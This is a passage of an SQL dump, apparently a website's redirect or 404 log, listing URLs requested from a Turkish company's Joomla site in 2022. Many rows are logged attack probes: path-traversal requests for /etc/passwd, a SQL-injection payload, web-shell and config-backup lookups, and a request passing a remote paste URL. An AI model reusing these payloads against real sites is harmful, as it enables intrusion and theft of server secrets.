00:00:00',301),(29949,'http://3s-technologies.com.tr/tr/upload/server/php-files/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-08-18 16:08:06','0000-00-00 00:00:00',301),(29950,'http://3s-technologies.com.tr/en/images/slideshow/0-cm602_cm101.jpg',NULL,'','',1,0,'2022-08-18 16:24:13','0000-00-00 00:00:00',301),(29951,'http://3s-technologies.com.tr/en/images/slideshow/80-sp18_av3.jpg',NULL,'','',14,0,'2022-08-18 16:24:18','0000-00-00 00:00:00',301),(29952,'http://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/images/prev.png',NULL,'','',1,0,'2022-08-18 16:24:19','0000-00-00 00:00:00',301),(29953,'http://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/images/next.png',NULL,'','',1,0,'2022-08-18 16:24:20','0000-00-00 00:00:00',301),(29954,'http://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/images/play.png',NULL,'','',1,0,'2022-08-18 16:24:20','0000-00-00 00:00:00',301),(29955,'http://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/images/pause.png',NULL,'','',1,0,'2022-08-18 16:24:21','0000-00-00 00:00:00',301),(29956,'http://3s-technologies.com.tr/en/media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-08-18 16:24:21','0000-00-00 00:00:00',301),(29957,'http://3s-technologies.com.tr/en/media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-08-18 16:24:22','0000-00-00 00:00:00',301),(29958,'http://3s-technologies.com.tr/en/images/stories/virtuemart/manufacturer/resized/logo-ddm_300x300.jpg',NULL,'','',1,0,'2022-08-18 16:24:22','0000-00-00 00:00:00',301),(29959,'http://3s-technologies.com.tr/en/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_300x300.jpg',NULL,'','',1,0,'2022-08-18 16:24:23','0000-00-00 00:00:00',301),(29960,'http://3s-technologies.com.tr/en/images/stories/virtuemart/manufacturer/resized/tolo_logo_300x300.jpg',NULL,'','',1,0,'2022-08-18 16:24:23','0000-00-00 00:00:00',301),(29961,'http://3s-technologies.com.tr/en/images/ddm/le40v.png',NULL,'','',1,0,'2022-08-18 16:24:24','0000-00-00 00:00:00',301),(29962,'http://3s-technologies.com.tr/en/images/panasonic/am100.jpg',NULL,'','',1,0,'2022-08-18 16:24:24','0000-00-00 00:00:00',301),(29963,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2','',6,0,'2022-08-20 02:47:44','0000-00-00 00:00:00',301),(29964,'http://3s-technologies.com.tr/tr/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css',NULL,'','',3,0,'2022-08-20 03:42:32','0000-00-00 00:00:00',301),(29965,'https://www.3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',48,0,'2022-08-21 07:21:08','0000-00-00 00:00:00',301),(29966,'http://3s-technologies.com.tr/tr/admin/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-08-21 13:54:12','0000-00-00 00:00:00',301),(29967,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/images/brochures/panacim_en_20_0101.pdf',NULL,'','',1,0,'2022-08-21 19:45:05','0000-00-00 00:00:00',301),(29968,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/by,mf_name?language=tr-tr&keyword=',NULL,'','',2,0,'2022-08-21 21:57:11','0000-00-00 00:00:00',301),(29969,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/ana-sayfa/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/ana-sayfa/80-turkish-tr/turkish-content','',10,0,'2022-08-22 11:07:23','0000-00-00 00:00:00',301),(29970,'http://3s-technologies.com.tr/tr/sitemap',NULL,'','',122,0,'2022-08-22 17:48:35','0000-00-00 00:00:00',301),(29971,'http://www.3s-technologies.com.tr/tr/app/etc/local.xml',NULL,'','',5,0,'2022-08-22 18:41:06','0000-00-00 00:00:00',301),(29972,'http://www.3s-technologies.com.tr/tr/amfeed/main/download?file=../../../app/etc/local.xml',NULL,'','',5,0,'2022-08-22 18:41:07','0000-00-00 00:00:00',301),(29973,'http://www.3s-technologies.com.tr/tr/magmi-importer/web/download_file.php?file=../../app/etc/local.xml',NULL,'','',5,0,'2022-08-22 18:41:07','0000-00-00 00:00:00',301),(29974,'http://www.3s-technologies.com.tr/tr/magmi/web/download_file.php?file=../../app/etc/local.xml',NULL,'','',5,0,'2022-08-22 18:41:08','0000-00-00 00:00:00',301),(29975,'http://www.3s-technologies.com.tr/tr/magmi-importer/conf/magmi.ini',NULL,'','',5,0,'2022-08-22 18:41:08','0000-00-00 00:00:00',301),(29976,'http://www.3s-technologies.com.tr/tr/magmi/conf/magmi.ini',NULL,'','',5,0,'2022-08-22 18:41:09','0000-00-00 00:00:00',301),(29977,'http://www.3s-technologies.com.tr/tr/var/cache/mage--2',NULL,'','',5,0,'2022-08-22 18:41:09','0000-00-00 00:00:00',301),(29978,'http://www.3s-technologies.com.tr/tr/var/resource_config.json',NULL,'','',5,0,'2022-08-22 18:41:09','0000-00-00 00:00:00',301),(29979,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/am100-detail/askquestion?tmpl=component',NULL,'','',1,0,'2022-08-24 20:04:11','0000-00-00 00:00:00',301),(29980,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,product_sku?language=tr-tr&keyword=',NULL,'','',2,0,'2022-08-26 01:07:40','0000-00-00 00:00:00',301),(29981,'https://www.3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/100-panasonic-overview',NULL,'','',15,0,'2022-08-26 11:40:50','0000-00-00 00:00:00',301),(29982,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr//images/stories/wawalo.gif',NULL,'','',1,0,'2022-08-26 16:04:35','0000-00-00 00:00:00',301),(29983,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,product_sku?language=tr-tr&keyword=',NULL,'','',3,0,'2022-08-28 00:35:54','0000-00-00 00:00:00',301),(29984,'http://3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',17,0,'2022-08-28 18:53:33','0000-00-00 00:00:00',301),(29985,'http://3s-technologies.com.tr/en/wp-content/uploads/typehub/custom/sakstizj/.v4.php',NULL,'www.google.com','',1,0,'2022-08-30 07:37:28','0000-00-00 00:00:00',301),(29986,'https://3s-technologies.com.tr/en/wp-content/uploads/typehub/custom/oqijrnpy/.v4.php',NULL,'www.google.com','',1,0,'2022-08-30 07:38:56','0000-00-00 00:00:00',301),(29987,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/perl.alfa',NULL,'','',14,0,'2022-08-30 13:38:10','0000-00-00 00:00:00',301),(29988,'https://www.3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',49,0,'2022-08-31 08:05:44','0000-00-00 00:00:00',301),(29989,'http://3s-technologies.com.tr/tr/:2083',NULL,'','',1,0,'2022-09-01 03:30:45','0000-00-00 00:00:00',301),(29990,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/80-turkish-tr/turkish-content','',3,0,'2022-09-01 20:21:13','0000-00-00 00:00:00',301),(29991,'https://3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'https://3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2','',6,0,'2022-09-02 02:17:22','0000-00-00 00:00:00',301),(29992,'https://3s-technologies.com.tr/tr/hakk',NULL,'','',23,0,'2022-09-02 08:09:04','0000-00-00 00:00:00',301),(29993,'https://3s-technologies.com.tr/tr/ah',NULL,'','',12,0,'2022-09-02 08:09:04','0000-00-00 00:00:00',301),(29994,'https://3s-technologies.com.tr/tr/wood-processing-ah',NULL,'','',16,0,'2022-09-02 08:09:04','0000-00-00 00:00:00',301),(29995,'https://3s-technologies.com.tr/tr/akrilik-i',NULL,'','',21,0,'2022-09-02 08:09:04','0000-00-00 00:00:00',301),(29996,'https://3s-technologies.com.tr/tr/nav',NULL,'','',5,0,'2022-09-02 08:09:06','0000-00-00 00:00:00',301),(29997,'https://3s-technologies.com.tr/tr/aluminyum-i',NULL,'','',17,0,'2022-09-02 08:09:07','0000-00-00 00:00:00',301),(29998,'https://3s-technologies.com.tr/tr/title=',NULL,'','',5,0,'2022-09-02 08:09:07','0000-00-00 00:00:00',301),(29999,'https://3s-technologies.com.tr/tr/administrator/index.php',NULL,'','',1,0,'2022-09-02 21:59:16','0000-00-00 00:00:00',301),(30000,'http://3s-technologies.com.tr/tr/configuration.bak',NULL,'','',1,0,'2022-09-03 02:15:59','0000-00-00 00:00:00',301),(30001,'https://3s-technologies.com.tr/tr/configuration',NULL,'','',1,0,'2022-09-03 04:12:46','0000-00-00 00:00:00',301),(30002,'https://3s-technologies.com.tr/tr/configuration.bak',NULL,'','',1,0,'2022-09-03 04:12:47','0000-00-00 00:00:00',301),(30003,'http://mail.3s-technologies.com.tr/tr/configuration.php',NULL,'','',1,0,'2022-09-03 05:51:57','0000-00-00 00:00:00',301),(30004,'http://mail.3s-technologies.com.tr/tr/configuration',NULL,'','',1,0,'2022-09-03 05:51:58','0000-00-00 00:00:00',301),(30005,'http://mail.3s-technologies.com.tr/tr/configuration.bak',NULL,'','',1,0,'2022-09-03 05:51:58','0000-00-00 00:00:00',301),(30006,'http://mail.3s-technologies.com.tr/tr/configuration.php.bak',NULL,'','',1,0,'2022-09-03 05:51:59','0000-00-00 00:00:00',301),(30007,'https://3s-technologies.com.tr/tr/installation/sql/databases.ini',NULL,'','',1,0,'2022-09-03 11:33:39','0000-00-00 00:00:00',301),(30008,'http://mail.3s-technologies.com.tr/tr/installation/sql/databases.ini',NULL,'','',1,0,'2022-09-03 12:14:44','0000-00-00 00:00:00',301),(30009,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/templates/atomic/home-page-atomic/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/templates/atomic/home-page-atomic','',3,0,'2022-09-03 12:39:51','0000-00-00 00:00:00',301),(30010,'http://www.3s-technologies.com.tr/en/wp-load.php',NULL,'www.bing.com','',6,0,'2022-09-03 15:54:05','0000-00-00 00:00:00',301),(30011,'http://www.3s-technologies.com.tr/en/wp-admin/style.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:08','0000-00-00 00:00:00',301),(30012,'http://www.3s-technologies.com.tr/en/s_e.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:09','0000-00-00 00:00:00',301),(30013,'http://www.3s-technologies.com.tr/en/s_ne.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:11','0000-00-00 00:00:00',301),(30014,'http://www.3s-technologies.com.tr/en/radio.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:14','0000-00-00 00:00:00',301),(30015,'http://www.3s-technologies.com.tr/en/doc.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:16','0000-00-00 00:00:00',301),(30016,'http://www.3s-technologies.com.tr/en/wp_wrong_datlib.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:18','0000-00-00 00:00:00',301),(30017,'http://www.3s-technologies.com.tr/en/beence.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:20','0000-00-00 00:00:00',301),(30018,'http://www.3s-technologies.com.tr/en/ups.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:22','0000-00-00 00:00:00',301),(30019,'http://www.3s-technologies.com.tr/en/wp-signin.php?dizo&ping',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:25','0000-00-00 00:00:00',301),(30020,'http://www.3s-technologies.com.tr/en/media-admin.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:28','0000-00-00 00:00:00',301),(30021,'http://www.3s-technologies.com.tr/en/export.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:31','0000-00-00 00:00:00',301),(30022,'http://www.3s-technologies.com.tr/en/wp-content/export.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:33','0000-00-00 00:00:00',301),(30023,'http://www.3s-technologies.com.tr/en/wp-includes/wp-class.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:34','0000-00-00 00:00:00',301),(30024,'http://www.3s-technologies.com.tr/en/wp-includes/wp-atom.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:37','0000-00-00 00:00:00',301),(30025,'http://www.3s-technologies.com.tr/en/wp-includes/images/css.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:39','0000-00-00 00:00:00',301),(30026,'http://www.3s-technologies.com.tr/en/defau1t.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:43','0000-00-00 00:00:00',301),(30027,'http://www.3s-technologies.com.tr/en/wp-includes/css/wp-config.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:54:54','0000-00-00 00:00:00',301),(30028,'http://www.3s-technologies.com.tr/en/wp-plugins.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:05','0000-00-00 00:00:00',301),(30029,'http://www.3s-technologies.com.tr/en/gank.php.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:07','0000-00-00 00:00:00',301),(30030,'http://www.3s-technologies.com.tr/en/wp-content/db-cache.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:09','0000-00-00 00:00:00',301),(30031,'http://www.3s-technologies.com.tr/en/archives.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:18','0000-00-00 00:00:00',301),(30032,'http://www.3s-technologies.com.tr/en/defau11.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:20','0000-00-00 00:00:00',301),(30033,'http://www.3s-technologies.com.tr/en/wp-content/outcms.php?up',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:23','0000-00-00 00:00:00',301),(30034,'http://www.3s-technologies.com.tr/en/system_log.php?bala=up',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:25','0000-00-00 00:00:00',301),(30035,'http://www.3s-technologies.com.tr/en/wp-backup-sql-302.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:27','0000-00-00 00:00:00',301),(30036,'http://www.3s-technologies.com.tr/en/error.php?phpshells',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:30','0000-00-00 00:00:00',301),(30037,'http://www.3s-technologies.com.tr/en/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:33','0000-00-00 00:00:00',301),(30038,'http://www.3s-technologies.com.tr/en/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:35','0000-00-00 00:00:00',301),(30039,'http://www.3s-technologies.com.tr/en/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:37','0000-00-00 00:00:00',301),(30040,'http://www.3s-technologies.com.tr/en/.well-known/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:38','0000-00-00 00:00:00',301),(30041,'http://www.3s-technologies.com.tr/en/.well-known/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:41','0000-00-00 00:00:00',301),(30042,'http://www.3s-technologies.com.tr/en/.well-known/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:42','0000-00-00 00:00:00',301),(30043,'http://www.3s-technologies.com.tr/en/wp-content/uploads/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:43','0000-00-00 00:00:00',301),(30044,'http://www.3s-technologies.com.tr/en/wp-content/uploads/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:45','0000-00-00 00:00:00',301),(30045,'http://www.3s-technologies.com.tr/en/wp-content/uploads/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:46','0000-00-00 00:00:00',301),(30046,'http://www.3s-technologies.com.tr/en/wp-includes/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:48','0000-00-00 00:00:00',301),(30047,'http://www.3s-technologies.com.tr/en/wp-includes/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:49','0000-00-00 00:00:00',301),(30048,'http://www.3s-technologies.com.tr/en/wp-includes/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:50','0000-00-00 00:00:00',301),(30049,'http://www.3s-technologies.com.tr/en/wp-admin/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:51','0000-00-00 00:00:00',301),(30050,'http://www.3s-technologies.com.tr/en/wp-admin/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:53','0000-00-00 00:00:00',301),(30051,'http://www.3s-technologies.com.tr/en/wp-admin/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:54','0000-00-00 00:00:00',301),(30052,'http://www.3s-technologies.com.tr/en/wp-content/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:56','0000-00-00 00:00:00',301),(30053,'http://www.3s-technologies.com.tr/en/wp-content/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:57','0000-00-00 00:00:00',301),(30054,'http://www.3s-technologies.com.tr/en/wp-content/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:55:59','0000-00-00 00:00:00',301),(30055,'http://www.3s-technologies.com.tr/en/templates/beez3/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:00','0000-00-00 00:00:00',301),(30056,'http://www.3s-technologies.com.tr/en/templates/beez3/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:02','0000-00-00 00:00:00',301),(30057,'http://www.3s-technologies.com.tr/en/templates/beez3/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:05','0000-00-00 00:00:00',301),(30058,'http://www.3s-technologies.com.tr/en/sites/default/files/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:08','0000-00-00 00:00:00',301),(30059,'http://www.3s-technologies.com.tr/en/sites/default/files/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:17','0000-00-00 00:00:00',301),(30060,'http://www.3s-technologies.com.tr/en/sites/default/files/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:24','0000-00-00 00:00:00',301),(30061,'http://www.3s-technologies.com.tr/en/admin/controller/extension/extension/alfa_data',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:26','0000-00-00 00:00:00',301),(30062,'http://www.3s-technologies.com.tr/en/admin/controller/extension/extension/alfacgiapi',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:29','0000-00-00 00:00:00',301),(30063,'http://www.3s-technologies.com.tr/en/admin/controller/extension/extension/cgialfa',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:31','0000-00-00 00:00:00',301),(30064,'http://www.3s-technologies.com.tr/en/olux.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:38','0000-00-00 00:00:00',301),(30065,'http://www.3s-technologies.com.tr/en/xleet.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:39','0000-00-00 00:00:00',301),(30066,'http://www.3s-technologies.com.tr/en/wso.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:41','0000-00-00 00:00:00',301),(30067,'http://www.3s-technologies.com.tr/en/shell.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:43','0000-00-00 00:00:00',301),(30068,'http://www.3s-technologies.com.tr/en/x.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:52','0000-00-00 00:00:00',301),(30069,'http://www.3s-technologies.com.tr/en/z.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:53','0000-00-00 00:00:00',301),(30070,'http://www.3s-technologies.com.tr/en/a.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:54','0000-00-00 00:00:00',301),(30071,'http://www.3s-technologies.com.tr/en/test.php',NULL,'www.bing.com','',4,0,'2022-09-03 15:56:56','0000-00-00 00:00:00',301),(30072,'http://www.3s-technologies.com.tr/en/wp.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:56:57','0000-00-00 00:00:00',301),(30073,'http://www.3s-technologies.com.tr/en/about.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:57:00','0000-00-00 00:00:00',301),(30074,'http://www.3s-technologies.com.tr/en/shells.php',NULL,'www.bing.com','',3,0,'2022-09-03 15:57:01','0000-00-00 00:00:00',301),(30075,'http://3s-technologies.com.tr/tr/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd',NULL,'','',2,0,'2022-09-04 18:08:52','0000-00-00 00:00:00',301),(30076,'http://3s-technologies.com.tr/tr/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd',NULL,'','',1,0,'2022-09-04 18:08:53','0000-00-00 00:00:00',301),(30077,'http://3s-technologies.com.tr/tr/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd\0',NULL,'','',2,0,'2022-09-04 18:08:54','0000-00-00 00:00:00',301),(30078,'http://3s-technologies.com.tr/tr/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd',NULL,'','',2,0,'2022-09-04 18:08:56','0000-00-00 00:00:00',301),(30079,'http://3s-technologies.com.tr/tr/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=anyfilename.exe',NULL,'','',2,0,'2022-09-04 18:08:57','0000-00-00 00:00:00',301),(30080,'http://3s-technologies.com.tr/tr/pandora_console/ajax.php?page=../../../../../../etc/passwd',NULL,'','',2,0,'2022-09-04 18:09:00','0000-00-00 00:00:00',301),(30081,'http://3s-technologies.com.tr/tr/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1',NULL,'','',2,0,'2022-09-04 18:09:02','0000-00-00 00:00:00',301),(30082,'http://3s-technologies.com.tr/tr/libraries/joomla/database/',NULL,'','',1,0,'2022-09-04 18:09:03','0000-00-00 00:00:00',301),(30083,'http://3s-technologies.com.tr/tr/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\" union select null,null,concat_ws(0x203a20,user(),database(),version(),0x6e75636c65692d74656d706c617465),null,null,null,null,null-- aa',NULL,'http://3s-technologies.com.tr/tr','',2,0,'2022-09-04 18:09:05','0000-00-00 00:00:00',301),(30084,'http://3s-technologies.com.tr/tr/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd',NULL,'','',2,0,'2022-09-04 18:09:09','0000-00-00 00:00:00',301),(30085,'http://3s-technologies.com.tr/tr/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd',NULL,'','',2,0,'2022-09-04 18:09:11','0000-00-00 00:00:00',301),(30086,'http://3s-technologies.com.tr/tr/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd',NULL,'','',2,0,'2022-09-04 18:09:16','0000-00-00 00:00:00',301),(30087,'http://3s-technologies.com.tr/tr/htaccess.txt',NULL,'','',1,0,'2022-09-04 18:09:18','0000-00-00 00:00:00',301),(30088,'http://3s-technologies.com.tr/tr/administrator/components/com_joomla-visites/core/include/mymailer.class.php?mosconfig_absolute_path=../../../../../../../../../../../../etc/passwd',NULL,'','',2,0,'2022-09-04 18:09:26','0000-00-00 00:00:00',301),(30089,'http://3s-technologies.com.tr/tr/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd\0',NULL,'','',2,0,'2022-09-04 18:09:27','0000-00-00 00:00:00',301),(30090,'http://3s-technologies.com.tr/tr/administrator/',NULL,'','',1,0,'2022-09-04 18:09:31','0000-00-00 00:00:00',301),(30091,'http://3s-technologies.com.tr/tr/wp/xmlrpc.php',NULL,'','',1,0,'2022-09-05 22:44:36','0000-00-00 00:00:00',301),(30092,'http://3s-technologies.com.tr/tr/wordpress/xmlrpc.php',NULL,'','',1,0,'2022-09-05 22:44:38','0000-00-00 00:00:00',301),(30093,'http://3s-technologies.com.tr/tr/old/xmlrpc.php',NULL,'','',1,0,'2022-09-05 22:44:40','0000-00-00 00:00:00',301),(30094,'http://3s-technologies.com.tr/tr/new/xmlrpc.php',NULL,'','',1,0,'2022-09-05 22:44:42','0000-00-00 00:00:00',301),(30095,'http://3s-technologies.com.tr/tr/blog/xmlrpc.php',NULL,'','',1,0,'2022-09-05 22:44:44','0000-00-00 00:00:00',301),(30096,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/templates/beez5/home-page-beez5/80-turkish-tr/turkish-content/100-panasonic-overview',NULL,'','',20,0,'2022-09-06 13:44:39','0000-00-00 00:00:00',301),(30097,'http://3s-technologies.com.tr/tr/wp-includes/customize/class-wp-customize-nav-menu.php?new',NULL,'','',1,0,'2022-09-07 00:13:17','0000-00-00 00:00:00',301),(30098,'http://3s-technologies.com.tr/tr/wp-content/themes/un.php?php=https://textbin.net/raw/k9bbqot3ml',NULL,'','',1,0,'2022-09-07 00:13:48','0000-00-00 00:00:00',301),(30099,'http://3s-technologies.com.tr/tr/wp-includes/customize/class-wp-customize-nav-menu.php?null=1',NULL,'','',1,0,'2022-09-07 00:14:21','0000-00-00 00:00:00',301),(30100,'https://3s-technologies.com.tr/tr/csrf.token',NULL,'https://3s-technologies.com.tr/tr/','',1,0,'2022-09-11 06:18:58','0000-00-00 00:00:00',301),(30101,'https://3s-technologies.com.tr/tr/system.paths',NULL,'https://3s-technologies.com.tr/tr/','',1,0,'2022-09-11 06:19:00','0000-00-00 00:00:00',301),(30102,'https://3s-technologies.com.tr/tr/system.keepalive',NULL,'https://3s-technologies.com.tr/tr/iletisim','',1,0,'2022-09-11 06:19:25','0000-00-00 00:00:00',301),(30103,'https://3s-technologies.com.tr/tr/joomla.jtext',NULL,'https://3s-technologies.com.tr/tr/iletisim','',1,0,'2022-09-11 06:19:27','0000-00-00 00:00:00',301),(30104,'https://3s-technologies.com.tr/en/system.keepalive',NULL,'https://3s-technologies.com.tr/en/contacts','',1,0,'2022-09-11 06:20:21','0000-00-00 00:00:00',301),(30105,'https://3s-technologies.com.tr/en/joomla.jtext',NULL,'https://3s-technologies.com.tr/en/contacts','',1,0,'2022-09-11 06:20:23','0000-00-00 00:00:00',301),(30106,'https://3s-technologies.com.tr/tr/contact.submit',NULL,'https://3s-technologies.com.tr/tr/iletisim','',1,0,'2022-09-11 06:20:25','0000-00-00 00:00:00',301),(30107,'https://3s-technologies.com.tr/en/contact.submit',NULL,'https://3s-technologies.com.tr/en/contacts','',1,0,'2022-09-11 06:20:51','0000-00-00 00:00:00',301),(30108,'http://3s-technologies.com.tr/en/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',16,0,'2022-09-11 08:08:08','0000-00-00 00:00:00',301),(30109,'https://3s-technologies.com.tr/en/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',11,0,'2022-09-11 08:08:17','0000-00-00 00:00:00',301),(30110,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/smd-orta-hä±zlä±',NULL,'','',2,0,'2022-09-12 01:40:09','0000-00-00 00:00:00',301),(30111,'https://www.3s-technologies.com.tr/en/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',7,0,'2022-09-12 18:14:41','0000-00-00 00:00:00',301),(30112,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/odd-shape-inserter',NULL,'','',2,0,'2022-09-13 02:17:20','0000-00-00 00:00:00',301),(30113,'http://3s-technologies.com.tr/tr/aluminyum-işleme-aluminum-processing',NULL,'','',103,0,'2022-09-13 03:23:34','0000-00-00 00:00:00',301),(30114,'https://3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',13,0,'2022-09-13 12:47:41','0000-00-00 00:00:00',301),(30115,'http://3s-technologies.com.tr/en/wp-commentin.php',NULL,'www.google.com','',10,0,'2022-09-14 12:20:42','0000-00-00 00:00:00',301),(30116,'http://3s-technologies.com.tr/en/wp/wp-commentin.php',NULL,'www.google.com','',1,0,'2022-09-14 12:20:46','0000-00-00 00:00:00',301),(30117,'http://3s-technologies.com.tr/en/wordpress/wp-commentin.php',NULL,'www.google.com','',1,0,'2022-09-14 12:20:50','0000-00-00 00:00:00',301),(30118,'http://3s-technologies.com.tr/en/blog/wp-commentin.php',NULL,'www.google.com','',1,0,'2022-09-14 12:20:55','0000-00-00 00:00:00',301),(30119,'http://3s-technologies.com.tr/en/site/wp-commentin.php',NULL,'www.google.com','',1,0,'2022-09-14 12:21:11','0000-00-00 00:00:00',301),(30120,'http://3s-technologies.com.tr/tr/pcb-prototip-prototyping',NULL,'','',103,0,'2022-09-15 01:38:45','0000-00-00 00:00:00',301),(30121,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',2,0,'2022-09-15 05:32:49','0000-00-00 00:00:00',301),(30122,'http://3s-technologies.com.tr/en/makhdamax.php',NULL,'','',1,0,'2022-09-15 15:35:02','0000-00-00 